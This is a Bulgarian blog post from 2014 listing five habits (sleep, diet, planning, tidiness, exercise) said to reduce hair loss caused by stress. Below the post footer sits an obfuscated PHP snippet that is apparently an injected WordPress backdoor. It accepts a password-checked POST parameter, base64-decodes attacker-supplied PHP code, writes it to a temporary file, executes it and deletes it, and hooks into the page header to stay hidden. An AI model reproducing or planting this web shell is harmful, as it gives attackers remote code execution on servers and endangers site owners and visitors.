5 навика, които намаляват косопада при стрес | Косопад

5 навика, които намаляват косопада при стрес

Косопадът от стрес е свързан с навиците на човек. Има различни видове навици – физически, социални, морални, интелектуални, ментални, емоционални, хигиенни и др. Нека разгледаме кои 5 навика са най- важни, за да се справим с косопада:

стрес3

Режим на сън и ставане. Трябва да спите между 8 и 9 часа, за да намалите алопецията. Докато спим в тялото ни се случва важни дейности. Ако не спите достатъчно, се нарушават способностите ви да помните, да се концентрирате, да разрешавате проблеми, може да ви прави и агресивни. Прекаленото спане пък може да ви причини главоболие и болки в гърба. Спането 8-9 часа е много полезен навик за справяне с косопада от стрес.

Добро хранене. Яденето на плодове, зеленчуци и бяло месо намаляват алопецията от стрес. Лошото хранене обърква организма, нивото на кръвната захар, което пък причинява увеличаване на кортизола и адреналина – хормоните, свързани със стреса. Затова се стремете да се храните здравословно и балансирано, като поемате подходящ бройстрес5 калории.

Организирайте деня си. Стремете се да намирате време да свършите всичко запланувано за деня. Колкото повече неща се натрупват, толкова повече се стресирате.

Бъдете подредени. Подредете дома си. Много психолози смятат, че да си подреден успокоява, дава ни надежда и ни кара да се чувстваме удоволетворени. Така се настройвате положителни.

Правене на упражнения. Това е една от най- полезните дейности за човек. Не само подобрява физическото ни здраве – намалява нивата на триглицериди, лошия холестерол, поддържа мускулите и костите, подобрява сърдечната дейност и дишането, но и психологическото. Чувствате се доволни и имате енергия, за да свършите всичко.

17. януари 2014 17:38:01 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}